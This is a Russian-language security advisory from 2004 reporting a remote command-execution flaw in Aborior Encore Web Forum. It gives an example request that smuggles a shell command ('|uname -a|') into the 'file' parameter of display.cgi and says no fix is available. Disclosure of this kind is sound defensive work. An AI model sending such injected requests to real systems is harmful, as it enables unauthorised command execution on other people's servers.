Security Lab

Выполнение произвольных команд в Aborior Encore Web Forum.

Дата публикации:05.04.2004
Всего просмотров:2233
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Aborior Encore Web Forum I

Описание: Уязвимость обнаружена в Aborior's Encore Web Forum. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Пример:

http://[target]/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|

URL производителя:http://www.aborior.com/encore/index.shtml

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Remote Exploit for Aborior's Encore Web Forum